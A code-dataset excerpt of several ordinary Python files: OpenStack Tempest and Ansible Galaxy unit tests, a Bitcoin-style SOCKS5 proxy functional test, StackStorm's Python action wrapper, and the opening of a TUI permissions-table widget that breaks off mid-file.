            'tempest.lib.common.rest_client.RestClient.get',
            return_value=response))
        self.assertEqual(is_deleted,
                         self.client.is_resource_deleted(flavor_id))
    def test_is_resource_deleted_true_str_body(self):
        self._test_is_resource_deleted('2', bytes_body=False)
    def test_is_resource_deleted_true_byte_body(self):
        self._test_is_resource_deleted('2', bytes_body=True)
    def test_is_resource_deleted_false_str_body(self):
        self._test_is_resource_deleted('1', is_deleted=False, bytes_body=False)
    def test_is_resource_deleted_false_byte_body(self):
        self._test_is_resource_deleted('1', is_deleted=False, bytes_body=True)
    def _test_set_flavor_extra_spec(self, bytes_body=False):
        self.check_service_client_function(
            self.client.set_flavor_extra_spec,
            'tempest.lib.common.rest_client.RestClient.post',
            TestFlavorsClient.EXTRA_SPECS,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
            **TestFlavorsClient.EXTRA_SPECS)
    def test_set_flavor_extra_spec_str_body(self):
        self._test_set_flavor_extra_spec(bytes_body=False)
    def test_set_flavor_extra_spec_byte_body(self):
        self._test_set_flavor_extra_spec(bytes_body=True)
    def _test_list_flavor_extra_specs(self, bytes_body=False):
        self.check_service_client_function(
            self.client.list_flavor_extra_specs,
            'tempest.lib.common.rest_client.RestClient.get',
            TestFlavorsClient.EXTRA_SPECS,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6')
    def test_list_flavor_extra_specs_str_body(self):
        self._test_list_flavor_extra_specs(bytes_body=False)
    def test_list_flavor_extra_specs__byte_body(self):
        self._test_list_flavor_extra_specs(bytes_body=True)
    def _test_show_flavor_extra_spec(self, bytes_body=False):
        expected = {"key": "value"}
        self.check_service_client_function(
            self.client.show_flavor_extra_spec,
            'tempest.lib.common.rest_client.RestClient.get',
            expected,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
            key='key')
    def test_show_flavor_extra_spec_str_body(self):
        self._test_show_flavor_extra_spec(bytes_body=False)
    def test_show_flavor_extra_spec__byte_body(self):
        self._test_show_flavor_extra_spec(bytes_body=True)
    def _test_update_flavor_extra_spec(self, bytes_body=False):
        expected = {"key1": "value"}
        self.check_service_client_function(
            self.client.update_flavor_extra_spec,
            'tempest.lib.common.rest_client.RestClient.put',
            expected,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
            key='key1', **expected)
    def test_update_flavor_extra_spec_str_body(self):
        self._test_update_flavor_extra_spec(bytes_body=False)
    def test_update_flavor_extra_spec_byte_body(self):
        self._test_update_flavor_extra_spec(bytes_body=True)
    def test_unset_flavor_extra_spec(self):
        self.check_service_client_function(
            self.client.unset_flavor_extra_spec,
            'tempest.lib.common.rest_client.RestClient.delete', {},
            flavor_id='c782b7a9-33cd-45f0-b795-7f87f456408b', key='key')
    def _test_list_flavor_access(self, bytes_body=False):
        expected = {'flavor_access': [TestFlavorsClient.FAKE_FLAVOR_ACCESS]}
        self.check_service_client_function(
            self.client.list_flavor_access,
            'tempest.lib.common.rest_client.RestClient.get',
            expected,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6')
    def test_list_flavor_access_str_body(self):
        self._test_list_flavor_access(bytes_body=False)
    def test_list_flavor_access_byte_body(self):
        self._test_list_flavor_access(bytes_body=True)
    def _test_add_flavor_access(self, bytes_body=False):
        expected = {
            "flavor_access": [TestFlavorsClient.FAKE_FLAVOR_ACCESS]
        }
        self.check_service_client_function(
            self.client.add_flavor_access,
            'tempest.lib.common.rest_client.RestClient.post',
            expected,
            bytes_body,
            flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
            tenant_id='1a951d988e264818afe520e78697dcbf')
    def test_add_flavor_access_str_body(self):
        self._test_add_flavor_access(bytes_body=False)
    def test_add_flavor_access_byte_body(self):
        self._test_add_flavor_access(bytes_body=True)
    def _test_remove_flavor_access(self, bytes_body=False):
        expected = {
            "flavor_access": [TestFlavorsClient.FAKE_FLAVOR_ACCESS]
        }
        self.check_service_client_function(
            self.client.remove_flavor_access,
            'tempest.lib.common.rest_client.RestClient.post',
            expected,
            bytes_body,
            flavor_id='10',
            tenant_id='a6edd4d66ad04245b5d2d8716ecc91e3')
    def test_remove_flavor_access_str_body(self):
        self._test_remove_flavor_access(bytes_body=False)
    def test_remove_flavor_access_byte_body(self):
        self._test_remove_flavor_access(bytes_body=True)
795b004abe89692d5d053ce87ef7e19cab0ff783 | 1,121 | py | Python | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 2 | 2018-02-13T06:55:55.000Z | 2019-03-25T01:58:33.000Z | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 4 | 2017-06-29T14:07:16.000Z | 2019-11-13T13:51:21.000Z | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 3 | 2017-05-24T18:06:29.000Z | 2019-11-11T20:20:43.000Z | from unittest import TestCase
from yaml import load, dump
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from ansiblegalaxylocaldeps.gendottravis import extract_osl_from_dottravis, from_dcb_os_yml
class TestGenDotTravis(TestCase):
    """Unit tests for the gendottravis helpers."""
    def test_extract_osl_from_dottravis(self):
        """env entries are stripped of the 'OS=' prefix and come back sorted."""
        dottravis = load("""---
env:
  - OS=xyz
  - OS=abc
""", Loader=Loader)
        osl = extract_osl_from_dottravis(dottravis)
        self.assertEqual(len(osl), 2, 'osl length')
        self.assertEqual(osl[0], 'abc', 'chopped OS= correctly')
        self.assertEqual(osl[1], 'xyz', 'chopped OS= correctly')
    def test_from_dcb_os_yml(self):
        """The rendered document carries dist/python through and re-prefixes the OS list."""
        os_list = ['xyz', 'abc']
        dist = "bionic"
        py_ver = '1.2.3.4'
        script = ['run-cmd-1', 'run-cmd-2']
        rendered = from_dcb_os_yml(script, os_list, dist, py_ver)
        self.assertEqual(rendered['dist'], dist)
        self.assertEqual(rendered['python'], py_ver)
        self.assertEqual(len(rendered['env']), 2)
        self.assertEqual(rendered['env'][0], 'OS=abc')
        self.assertEqual(rendered['env'][1], 'OS=xyz')
| 33.969697 | 91 | 0.647636 |
795b00cf7c230f716b623ca258fc90bdf658a4bd | 6,098 | py | Python | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
import traceback, sys
from binascii import hexlify
import time, os
from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework import BitcoinTestFramework
from util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
    """Functional test: verify node proxy settings route connections through
    the expected SOCKS5 servers with the expected credentials."""
    def __init__(self):
        # Create two proxies on different ports
        # (PID-derived ports reduce collisions between concurrent test runs)
        # ... one unauthenticated
        self.conf1 = Socks5Configuration()
        self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
        self.conf1.unauth = True
        self.conf1.auth = False
        # ... one supporting authenticated and unauthenticated (Tor)
        self.conf2 = Socks5Configuration()
        self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
        self.conf2.unauth = True
        self.conf2.auth = True
        # ... one on IPv6 with similar configuration
        self.conf3 = Socks5Configuration()
        self.conf3.af = socket.AF_INET6
        self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
        self.conf3.unauth = True
        self.conf3.auth = True
        # Start all three mock SOCKS5 servers (threads).
        self.serv1 = Socks5Server(self.conf1)
        self.serv1.start()
        self.serv2 = Socks5Server(self.conf2)
        self.serv2.start()
        self.serv3 = Socks5Server(self.conf3)
        self.serv3.start()
    def setup_nodes(self):
        """Start four nodes, each with a different proxy configuration."""
        # Note: proxies are not used to connect to local nodes
        # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
        return start_nodes(4, self.options.tmpdir, extra_args=[
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0']
            ])
    def node_test(self, node, proxies, auth):
        """Drive one node through IPv4/IPv6/onion/DNS connection attempts.
        ``proxies`` lists, per destination kind, the mock server that should
        receive the connection. Returns the captured Socks5Command objects.
        """
        rv = []
        # Test: outgoing IPv4 connection through node
        node.addnode("15.61.23.23:1234", "onetry")
        cmd = proxies[0].queue.get()
        assert(isinstance(cmd, Socks5Command))
        # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "15.61.23.23")
        assert_equal(cmd.port, 1234)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)
        # Test: outgoing IPv6 connection through node
        node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
        cmd = proxies[1].queue.get()
        assert(isinstance(cmd, Socks5Command))
        # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
        assert_equal(cmd.port, 5443)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)
        # Test: outgoing onion connection through node
        node.addnode("wisprvj7kcklujarx.onion:17000", "onetry")
        cmd = proxies[2].queue.get()
        assert(isinstance(cmd, Socks5Command))
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "wisprvj7kcklujarx.onion")
        assert_equal(cmd.port, 17000)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)
        # Test: outgoing DNS name connection through node
        node.addnode("node.noumenon:8333", "onetry")
        cmd = proxies[3].queue.get()
        assert(isinstance(cmd, Socks5Command))
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "node.noumenon")
        assert_equal(cmd.port, 8333)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)
        return rv
    def run_test(self):
        """Exercise each node's proxy configuration."""
        # basic -proxy
        self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
        # -proxy plus -onion
        self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
        # -proxy plus -onion, -proxyrandomize
        rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
        # Check that credentials as used for -proxyrandomize connections are unique
        credentials = set((x.username,x.password) for x in rv)
        assert_equal(len(credentials), 4)
        # proxy on IPv6 localhost
        self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False)
if __name__ == '__main__':
ProxyTest().main()
| 41.767123 | 145 | 0.653001 |
795b0114a85e3b0f7eb9e06d3f29b6d98c871c49 | 14,688 | py | Python | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 4,920 | 2015-01-01T15:12:17.000Z | 2022-03-31T19:31:15.000Z | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 3,563 | 2015-01-05T19:02:19.000Z | 2022-03-31T19:23:09.000Z | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 774 | 2015-01-01T20:41:24.000Z | 2022-03-31T13:25:29.000Z | # Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
# Ignore CryptographyDeprecationWarning warnings which appear on older versions of Python 2.7
import warnings
from cryptography.utils import CryptographyDeprecationWarning
warnings.filterwarnings("ignore", category=CryptographyDeprecationWarning)
import os
import sys
import select
import traceback
import distutils.sysconfig
# NOTE: We intentionally use orjson directly here instead of json_encode - orjson.dumps relies
# on config option which we don't parse for the action wrapper since it speeds things down - action
# wrapper should rely on as little imports as possible to make Python runner executions fast -
# that's very important.
import orjson
# Note: This work-around is required to fix the issue with other Python modules which live
# inside this directory polluting and masking sys.path for Python runner actions.
# Since this module is ran as a Python script inside a subprocess, directory where the script
# lives gets added to sys.path and we don't want that.
# Note: We need to use just the suffix, because full path is different depending if the process
# is ran in virtualenv or not
# Suffix identifying the runners directory that Python prepends to sys.path
# when this file is executed as a script; used below to undo that pollution.
RUNNERS_PATH_SUFFIX = "st2common/runners"
if __name__ == "__main__":
    # sys.path[0] is the directory of the script being run; drop it if it is
    # the runners directory so its modules don't shadow action imports.
    script_path = sys.path[0]
    if RUNNERS_PATH_SUFFIX in script_path:
        sys.path.pop(0)
# This puts priority on loading virtualenv library in the pack's action. This is necessary
# for the situation that both st2 and pack require to load same name libraries with different
# version. Without this statement, action may call library method with unexpected dependencies.
sys.path.insert(0, distutils.sysconfig.get_python_lib())
import sys
import argparse
import six
from st2common import log as logging
from st2common import config as st2common_config
from st2common.runners.base_action import Action
from st2common.runners.utils import get_logger_for_python_runner_action
from st2common.runners.utils import get_action_class_instance
from st2common.util import loader as action_loader
from st2common.constants.action import ACTION_OUTPUT_RESULT_DELIMITER
from st2common.constants.keyvalue import SYSTEM_SCOPE
from st2common.constants.runners import PYTHON_RUNNER_INVALID_ACTION_STATUS_EXIT_CODE
from st2common.constants.runners import PYTHON_RUNNER_DEFAULT_LOG_LEVEL
# Public API of this module.
__all__ = ["PythonActionWrapper", "ActionService"]
LOG = logging.getLogger(__name__)
# User-facing guidance emitted when an action returns a value whose status
# flag cannot be interpreted (legacy two-item tuple return format).
INVALID_STATUS_ERROR_MESSAGE = """
If this is an existing action which returns a tuple with two items, it needs to be updated to
either:
1. Return a list instead of a tuple
2. Return a tuple where a first items is a status flag - (True, ('item1', 'item2'))
For more information, please see: https://docs.stackstorm.com/upgrade_notes.html#st2-v1-6
""".strip()
# How many seconds to wait for stdin input when parameters are passed in via stdin before
# timing out
READ_STDIN_INPUT_TIMEOUT = 2
class ActionService(object):
    """
    Instance of this class is passed to the action instance and exposes "public" methods which can
    be called by the action.
    """
    def __init__(self, action_wrapper):
        # Wrapper holding pack/class/log-level context for this execution.
        self._action_wrapper = action_wrapper
        # Lazily-created datastore client (see the property below).
        self._datastore_service = None
    @property
    def datastore_service(self):
        """Lazily construct and cache the per-action datastore client."""
        # Late import to avoid very expensive in-direct import (~1 second) when this function is
        # not called / used
        from st2common.services.datastore import ActionDatastoreService
        if not self._datastore_service:
            # Note: We use temporary auth token generated by the container which is valid for the
            # duration of the action lifetime
            action_name = self._action_wrapper._class_name
            log_level = self._action_wrapper._log_level
            logger = get_logger_for_python_runner_action(
                action_name=action_name, log_level=log_level
            )
            pack_name = self._action_wrapper._pack
            class_name = self._action_wrapper._class_name
            auth_token = os.environ.get("ST2_ACTION_AUTH_TOKEN", None)
            self._datastore_service = ActionDatastoreService(
                logger=logger,
                pack_name=pack_name,
                class_name=class_name,
                auth_token=auth_token,
            )
        return self._datastore_service
    ##################################
    # General methods
    ##################################
    def get_user_info(self):
        """Return info about the user this action runs as (delegates to the datastore service)."""
        return self.datastore_service.get_user_info()
    ##################################
    # Methods for datastore management
    ##################################
    def list_values(self, local=True, prefix=None):
        """List datastore items, optionally filtered by key prefix."""
        return self.datastore_service.list_values(local=local, prefix=prefix)
    def get_value(self, name, local=True, scope=SYSTEM_SCOPE, decrypt=False):
        """Fetch a single datastore value by name."""
        return self.datastore_service.get_value(
            name=name, local=local, scope=scope, decrypt=decrypt
        )
    def set_value(
        self, name, value, ttl=None, local=True, scope=SYSTEM_SCOPE, encrypt=False
    ):
        """Store a datastore value, optionally with a TTL and encryption."""
        return self.datastore_service.set_value(
            name=name, value=value, ttl=ttl, local=local, scope=scope, encrypt=encrypt
        )
    def delete_value(self, name, local=True, scope=SYSTEM_SCOPE):
        """Delete a datastore value by name."""
        return self.datastore_service.delete_value(name=name, local=local, scope=scope)
class PythonActionWrapper(object):
    """Child-process wrapper which loads and runs a single Python runner action.

    The result is serialized to JSON and printed to stdout between two
    ACTION_OUTPUT_RESULT_DELIMITER markers so the parent (runner) process can
    reliably extract it from the rest of the process output.
    """

    def __init__(
        self,
        pack,
        file_path,
        config=None,
        parameters=None,
        user=None,
        parent_args=None,
        log_level=PYTHON_RUNNER_DEFAULT_LOG_LEVEL,
    ):
        """
        :param pack: Name of the pack this action belongs to.
        :type pack: ``str``

        :param file_path: Path to the action module.
        :type file_path: ``str``

        :param config: Pack config.
        :type config: ``dict``

        :param parameters: action parameters.
        :type parameters: ``dict`` or ``None``

        :param user: Name of the user who triggered this action execution.
        :type user: ``str``

        :param parent_args: Command line arguments passed to the parent process.
        :type parent_args: ``list``
        """
        self._pack = pack
        self._file_path = file_path
        self._config = config or {}
        self._parameters = parameters or {}
        self._user = user
        self._parent_args = parent_args or []
        self._log_level = log_level

        # Set once the action class has been loaded (see _get_action_instance)
        self._class_name = None
        self._logger = logging.getLogger("PythonActionWrapper")

        try:
            st2common_config.parse_args(args=self._parent_args)
        except Exception as e:
            # Best-effort: config parsing failure must not prevent the action from running
            LOG.debug(
                "Failed to parse config using parent args (parent_args=%s): %s"
                % (str(self._parent_args), six.text_type(e))
            )

        # Note: We can only set a default user value if one is not provided after parsing the
        # config
        if not self._user:
            # Note: We use late import to avoid performance overhead
            from oslo_config import cfg

            self._user = cfg.CONF.system_user.user

    def run(self):
        """Run the action and print its delimited JSON result to stdout.

        Exits the process with PYTHON_RUNNER_INVALID_ACTION_STATUS_EXIT_CODE if
        the action returned a two-item tuple whose first item is not a bool.
        """
        action = self._get_action_instance()
        output = action.run(**self._parameters)

        if isinstance(output, tuple) and len(output) == 2:
            # run() method returned status and data - (status, data)
            action_status = output[0]
            action_result = output[1]
        else:
            # run() method returned only data, no status (pre StackStorm v1.6)
            action_status = None
            action_result = output

        action_output = {"result": action_result, "status": None}

        if action_status is not None and not isinstance(action_status, bool):
            sys.stderr.write(
                "Status returned from the action run() method must either be "
                "True or False, got: %s\n" % (action_status)
            )
            sys.stderr.write(INVALID_STATUS_ERROR_MESSAGE)
            sys.exit(PYTHON_RUNNER_INVALID_ACTION_STATUS_EXIT_CODE)

        if action_status is not None and isinstance(action_status, bool):
            action_output["status"] = action_status

        # Special case if result object is not JSON serializable - aka user wanted to return a
        # non-simple type (e.g. class instance or other non-JSON serializable type)
        try:
            orjson.dumps(action_output["result"])
        except (TypeError, orjson.JSONDecodeError):
            action_output["result"] = str(action_output["result"])

        try:
            print_output = orjson.dumps(action_output)
        except Exception:
            # Fall back to the repr of the whole dict if it cannot be serialized
            print_output = str(action_output).encode("utf-8")

        # Data is bytes so we use sys.stdout.buffer which works with bytes and not sys.stdout
        # which works with strings / unicodes.
        # This way it also works correctly with unicode sequences.
        # Technically we could also write to sys.stdout, but this would require additional
        # conversion back and forth

        # Print output to stdout so the parent can capture it
        sys.stdout.buffer.write(ACTION_OUTPUT_RESULT_DELIMITER.encode("utf-8"))
        sys.stdout.buffer.write(print_output + b"\n")
        sys.stdout.buffer.write(ACTION_OUTPUT_RESULT_DELIMITER.encode("utf-8"))
        sys.stdout.flush()

    def _get_action_instance(self):
        """Load the action class from self._file_path and return an instance
        wired up with the pack config and an ActionService.

        Re-raises (with an augmented message) any error raised while loading
        the action module; raises a plain Exception if the file contains no
        action class.
        """
        try:
            actions_cls = action_loader.register_plugin(Action, self._file_path)
        except Exception as e:
            tb_msg = traceback.format_exc()
            msg = (
                'Failed to load action class from file "%s" (action file most likely doesn\'t '
                "exist or contains invalid syntax): %s"
                % (self._file_path, six.text_type(e))
            )
            msg += "\n\n" + tb_msg
            exc_cls = type(e)
            raise exc_cls(msg)

        action_cls = actions_cls[0] if actions_cls and len(actions_cls) > 0 else None

        if not action_cls:
            raise Exception(
                'File "%s" has no action class or the file doesn\'t exist.'
                % (self._file_path)
            )

        # Retrieve name of the action class
        # Note - we need to either use cls.__name_ or inspect.getmro(cls)[0].__name__ to
        # retrieve a correct name
        self._class_name = action_cls.__name__

        action_service = ActionService(action_wrapper=self)
        action_instance = get_action_class_instance(
            action_cls=action_cls, config=self._config, action_service=action_service
        )
        return action_instance
if __name__ == "__main__":
    # Entry point: parse CLI arguments, assemble the action parameters
    # (from --parameters and/or stdin) and run the wrapped action.
    parser = argparse.ArgumentParser(description="Python action runner process wrapper")
    parser.add_argument(
        "--pack", required=True, help="Name of the pack this action belongs to"
    )
    parser.add_argument("--file-path", required=True, help="Path to the action module")
    parser.add_argument(
        "--config", required=False, help="Pack config serialized as JSON"
    )
    parser.add_argument(
        "--parameters", required=False, help="Serialized action parameters"
    )
    parser.add_argument(
        "--stdin-parameters",
        required=False,
        action="store_true",
        help="Serialized action parameters via stdin",
    )
    parser.add_argument(
        "--user", required=False, help="User who triggered the action execution"
    )
    parser.add_argument(
        "--parent-args",
        required=False,
        help="Command line arguments passed to the parent process serialized as "
        " JSON",
    )
    parser.add_argument(
        "--log-level",
        required=False,
        default=PYTHON_RUNNER_DEFAULT_LOG_LEVEL,
        help="Log level for actions",
    )
    args = parser.parse_args()

    config = orjson.loads(args.config) if args.config else {}
    user = args.user
    parent_args = orjson.loads(args.parent_args) if args.parent_args else []
    log_level = args.log_level

    if not isinstance(config, dict):
        raise TypeError(f"Pack config needs to be a dictionary (was {type(config)}).")

    # Parameters may arrive via --parameters, via stdin, or both; values read
    # from stdin are merged over the command-line-provided ones.
    parameters = {}

    if args.parameters:
        LOG.debug("Getting parameters from argument")
        args_parameters = args.parameters
        args_parameters = orjson.loads(args_parameters) if args_parameters else {}
        parameters.update(args_parameters)

    if args.stdin_parameters:
        LOG.debug("Getting parameters from stdin")

        # Wait (bounded) for the parent to write the parameters to our stdin
        i, _, _ = select.select([sys.stdin], [], [], READ_STDIN_INPUT_TIMEOUT)

        if not i:
            raise ValueError(
                (
                    "No input received and timed out while waiting for "
                    "parameters from stdin"
                )
            )

        stdin_data = sys.stdin.readline().strip()

        if not stdin_data:
            # This could indicate that parent process (e.g. process which runs the tests has
            # incorrectly opened the stdin and that one is then inherited by the process which is
            # spawning it which will cause issues)
            raise ValueError("Received no valid parameters data from sys.stdin")

        try:
            stdin_parameters = orjson.loads(stdin_data)
            stdin_parameters = stdin_parameters.get("parameters", {})
        except Exception as e:
            msg = (
                "Failed to parse parameters from stdin. Expected a JSON object with "
                '"parameters" attribute: %s' % (six.text_type(e))
            )
            raise ValueError(msg)

        parameters.update(stdin_parameters)

    LOG.debug("Received parameters: %s", parameters)

    if not isinstance(parent_args, list):
        raise TypeError(f"The parent_args is not a list (was {type(parent_args)}).")

    obj = PythonActionWrapper(
        pack=args.pack,
        file_path=args.file_path,
        config=config,
        parameters=parameters,
        user=user,
        parent_args=parent_args,
        log_level=log_level,
    )

    obj.run()
| 37.090909 | 99 | 0.65802 |
795b027dbeba0fe77c3835759b3398722d015116 | 37,353 | py | Python | TUI/TUIMenu/Permissions/PermsTableWdg.py | ApachePointObservatory/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2020-01-28T06:28:00.000Z | 2020-01-28T06:28:00.000Z | TUI/TUIMenu/Permissions/PermsTableWdg.py | ApachePointObservatory/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2017-06-05T22:53:58.000Z | 2017-06-05T22:53:58.000Z | TUI/TUIMenu/Permissions/PermsTableWdg.py | r-owen/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2020-01-28T06:28:02.000Z | 2020-01-28T06:28:02.000Z | #!/usr/bin/env python
"""Specify what users from each program are allowed to do.
Note: the interface visible to the user uses the terms "add" and "delete"
because they are clear and succinct. However, the internal code use the
perms terminology "register" and "unregister" because they work
better in function calls when one might be toggling the state
and because the transition has to occur somewhere.
2003-12-19 ROwen Preliminary version; html help is broken.
2003-12-29 ROwen Implemented html help.
2004-07-22 ROwen Updated for new RO.KeyVariable
2004-07-29 ROwen Added read-only support.
2004-08-11 ROwen Use modified RO.Wdg state constants with st_ prefix.
2004-09-03 ROwen Modified for RO.Wdg.st_... -> RO.Constants.st_...
2004-11-16 ROwen Modified for RO.Wdg.Label change.
2005-01-06 ROwen Modified to use RO.Wdg.Label.setSeverity instead of setState.
Modified to use Checkbutton autoIsCurrent instead of
a separate changed indicator.
Fixed a bug in setReadOnly that prevented reliable toggling.
Fixed and improved test code.
2005-06-03 ROwen Stopped setting checkbutton padx and pady (rely on new decent defaults).
Fixed irregular indentation (extra spaces).
2006-06-16 ROwen Bug fix: helpSuffix arg was being ignored (caught by pychecker).
2006-04-10 ROwen Fix PR 314: if a new actor was added, it was not properly displayed.
Modified so "sort" sorts actorList as well as programs.
2006-10-31 ROwen Fix PR 511: program name widgets too narrow on unix.
2009-07-06 ROwen Fix PR 940: permissions window does not handle new actorList properly.
Modified to always sort actorList; only programs may be out of order.
Modified for updated TestData.
2009-07-09 ROwen Bug fix: bad class instance reference.
Modified test code to look more like tuisdss version.
2011-04-06 ROwen Modified to order actors by category. To do: display separation between categories.
2011-04-08 ROwen Renamed from PermsInputWdg to PermsTableWdg and made self-contained
(no need to create external frames for the header and scrolled table).
2011-07-27 ROwen Modified to find PermsModel in TUI.Models.
2011-08-12 ROwen Modified to highlight actor and program when the mouse is over a permission control.
2011-09-12 ROwen Bug fix: resizing was somewhat messed up.
Improved alignment, especially on unix.
2011-09-28 ROwen Bug fix: sorting and purging caused display errors
because _nameSpacerWdg was not reliably ungridded and regridded.
2011-10-12 ROwen Bug fix: the row 2 permissions had a line across it after sorting (the width measuring frame).
2012-07-09 ROwen Modified to use RO.TkUtil.Timer.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2012-11-13 ROwen Stop using Checkbutton indicatoron=False because it is no longer supported on MacOS X.
2012-11-19 ROwen Fix PR 1396: program button sent the wrong command.
2013-10-11 ROwen Removed an unused import (weakref) and an unused variable.
"""
import Tkinter
import RO.Constants
import RO.Alg
if __name__ == "__main__":
import RO.Comm.Generic
RO.Comm.Generic.setFramework("tk")
from RO.Comm.Generic import Timer
import RO.KeyVariable
import RO.Wdg
import TUI.TUIModel
import TUI.Models.PermsModel
_HelpPrefix = "TUIMenu/PermissionsWin.html#"
_ProgramWidth = 10 # width of program control buttons: need room for "Lockout" and checkbuttons
_NewActorDelay = 1.0 # display disable delay (sec) while adding or removing actorList
class ActorList(object):
    """A list of actors in category order.

    Also keeps track of the title widgets, for highlighting the current one.
    """
    def __init__(self, startCol=1):
        """Inputs:
        - startCol: grid column at which the first actor is displayed
          (actors and category dividers each occupy one column)
        """
        self._startCol = int(startCol)
        self._actorSet = set()
        self._colActorList = []
        self._titleWdgDict = {}

    def setActors(self, actors):
        """Set the actors

        Inputs:
        - actors: a collection of actors; order is ignored

        Actors are assigned consecutive grid columns, grouped by category;
        a (col, None) entry is inserted between categories as a divider.
        """
        self._actorSet = set(actors)
        # sort by category, then by actor name
        catActorList = sorted((self._getActorCategory(a), a) for a in actors)
        currCat = 1
        col = self._startCol
        self._colActorList = []
        for cat, actor in catActorList:
            if cat != currCat:
                # category changed: insert a divider column
                self._colActorList.append((col, None))
                currCat = cat
                col += 1
            self._colActorList.append((col, actor))
            col += 1

    def getTitleWdg(self, actor):
        """Return the title widget for this actor, or None if not found
        """
        return self._titleWdgDict.get(actor)

    def setTitleWdg(self, actor, wdg):
        """Set the title widget for an actor
        """
        self._titleWdgDict[actor] = wdg

    def clearAllTitleWdg(self):
        """Clear all title widgets
        """
